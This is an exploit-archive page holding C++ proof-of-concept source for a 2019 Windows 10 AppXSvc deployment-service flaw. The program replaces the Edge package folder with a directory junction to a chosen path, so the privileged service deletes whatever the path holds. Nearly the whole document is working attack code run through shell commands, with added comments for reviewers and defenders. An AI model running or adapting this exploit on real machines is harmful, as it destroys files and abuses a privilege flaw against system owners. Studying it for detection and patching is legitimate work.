Microsoft windows 10 appxsvc deployment service arbitrary file deletion Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-08-14 |
Type : local |
Platform : windows
/*
# Author : Abdelhamid Naceri
# Discovered On : 13/08/2019
# Description : An elevation-of-privilege vulnerability exists when the Microsoft AppXSvc
Deployment Service does not properly handle folder junctions, leading to arbitrary file deletion
by a low-integrity user.
# Still Unpatched On 13/08/2019
Here Is A Demo Video https://youtu.be/jqYwMcNvTtM
*/
#include"windows.h"
#include"iostream"
#include"conio.h"
#include"stdio.h"
#include"tlhelp32.h"
#include"cstdio"
#include"wchar.h"
#include"process.h"
#include"wchar.h"
#include"string"
#include"tchar.h"
// Demonstrates the AppXSvc deployment-service deletion issue described in the
// header comment: the per-user Edge package folder is emptied, replaced by a
// directory junction (mklink /J) pointing at `path`, and Edge is relaunched so
// that the service's cleanup, per the author's description, follows the
// junction into the target. The whole function is a side-effecting sequence
// (process start/kill, sleeps, shell commands via system()); it has no return
// value and normally ends the process itself with ExitProcess.
//
// Defender notes: the observable behaviour is a low-integrity user creating a
// reparse point under %USERPROFILE%\AppData\Local\Packages\<package> followed
// by a privileged service deleting through it. Privileged code that removes
// user-writable directories must not follow reparse points; auditing junction
// creation under Packages\ is a detection hook for exactly this sequence.
//
// @param path  Directory the junction will point at. Only checked with
//              dirExists(); it is spliced into shell command lines unescaped.
// Depends on helpers declared elsewhere in the file: dirExists, StartEdge,
// KillEdge, IsProcessRunning, killProcessByName, remove_dir.
void exploit(const char* path) {
// Locals. `attempt` is declared but never read.
int attempt = 0;
// Scratch buffer for every command line handed to system().
string command;
// NOTE(review): _wgetenv returns nullptr when USERPROFILE is unset; the
// wstring constructors below would then be passed a null pointer (UB).
wchar_t* userprofile = _wgetenv(L"USERPROFILE");
const wchar_t* relpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe");
// Author's note: wiping the package folder sometimes fails with access denied,
// so the RoamingState subfolder is removed first. `froamingpath` (the absolute
// form built on the next two lines) is constructed but never used.
const wchar_t* roamingpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState");
wstring froamingpath(userprofile);
froamingpath += wstring(roamingpath);
wstring fullpath(userprofile);
fullpath += std::wstring(relpath);
// C-style cast discards the const from c_str(); szBuffsrc aliases fullpath's
// internal buffer and is only valid while fullpath is not modified.
wchar_t* szBuffsrc = (wchar_t*)fullpath.c_str();
wstring fpath(szBuffsrc);
// Narrows each wchar_t to char; lossy for non-ASCII profile paths.
string strfpath(fpath.begin(), fpath.end());
// First-run handling: if the package folder does not exist yet, launch Edge so
// it creates the folder (the author's wording: so Edge writes its DACL). The
// loop waits until the process is observed running, then Edge is relaunched,
// given 7 s, and killed.
if (dirExists(strfpath) != true) {
printf("[!] Wait MS-Edge Need To Write The DACL");
StartEdge();
for (;;) {
Sleep(1000);
if (IsProcessRunning(L"MicrosoftEdge.exe") == true) { break; }
}
StartEdge();
Sleep(7000);
KillEdge();
// Overwrite the wait message on the same console line.
printf("\r ");
}
// Banner.
printf("\r# Author : Abdelhamid Naceri\n");
printf("# Tested On Windows 10 32&64bit\n");
printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
printf("[+] Checking If Path Exist ...");
Sleep(2000);
// The only validation of `path`: it must be an existing directory.
if (dirExists(path) != true) {
printf("Your Path Is Invalid");
ExitProcess(EXIT_FAILURE); }
else {
printf("Exist !\n");
KillEdge();
printf("[+] Starting MS-Edge ...\n");
StartEdge();
Sleep(4000);
printf("[+] Killing MS-Edge ...\n");
KillEdge();
Sleep(3000);
printf("[+] Wipping MS-Edge Directory ...\n");
// Author's note: dllhost.exe is killed because it sometimes holds the files open.
killProcessByName(L"dllhost.exe");
// Receives the relative suffix `roamingpath`, not the absolute `froamingpath`.
remove_dir(roamingpath);
// The package folder is removed twice with a pause in between.
remove_dir(szBuffsrc);
Sleep(2000);
remove_dir(szBuffsrc);
printf("[+] Checking If Directory Exist Anymore ...");
// The nested check repeats the outer one. If the folder survived, the user
// is asked to clear it by hand in Explorer, after which control jumps into
// the else-branch below via goto.
if (dirExists(strfpath) == true) {
if (dirExists(strfpath) == true) {
printf("Something Went Wrong");
printf("\n[!] You Should Delete The Files YourSelf Press Anything To Continue");
command = "explorer ";
command.append(strfpath);
system(command.c_str());
_getch();
goto Continue;
}
}
else {
// Label targeted by the goto above; legal (no initialisations are skipped)
// but it means this branch also runs on the "manual cleanup" path.
Continue:
printf(" Done\n");
Sleep(3000);
printf("[+] Attempting to Create Junction To Target ...\n");
// Builds  mklink /J "<package dir>" "<path>"  and runs it through the shell.
// `path` is quoted but not escaped, so an embedded '"' breaks the command.
command = "mklink /J ";
command.append("\"");
command.append(strfpath);
command.append("\"");
command.append(" ");
command.append("\"");
command.append(path);
command.append("\"");
system(command.c_str());
printf("Done\n");
Sleep(3000);
printf("[+] Firing Up MS-Edge Again ...\n");
StartEdge();
// Wait until Edge has exited, then start it once more.
do { Sleep(1000); } while (IsProcessRunning(L"MicrosoftEdge.exe"));
Sleep(3000);
StartEdge();
// Open the target in Explorer so the user can observe the result; `path`
// is appended without quoting here.
command = "explorer ";
command.append(path);
printf("[!] If The Exploit Done , MS AppXSvc Will Wipe The Target Path\n");
system(command.c_str());
printf("[!] We Will Open Explorer In The Target Check Your Files If The File Deleted Press Anything To Clear The Exploit Files...\n");
_getch();
printf("Cleaning ...");
// Cleanup: try removing the junction entry as a file, then as a directory.
_wremove(szBuffsrc);
_wrmdir(szBuffsrc);
// Terminates the process; control never returns to main on this path.
ExitProcess(EXIT_SUCCESS);
}
}
}
// Entry point. With exactly one argument (the target path) it hands control
// to exploit(), which normally ends the process itself via ExitProcess; with
// any other argument count it prints the banner plus usage and returns.
int main(int argc, char* argv[]) {
    if (argc != 2) {
        // One call; adjacent literals concatenate to the same four lines.
        printf("# Author : Abdelhamid Naceri\n"
               "# Tested On Windows 10 1903 32&64bit\n"
               "# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n"
               "[!] Usage : poc.exe TargetPath");
        return EXIT_SUCCESS;
    }
    exploit(argv[1]);
    return EXIT_SUCCESS;
}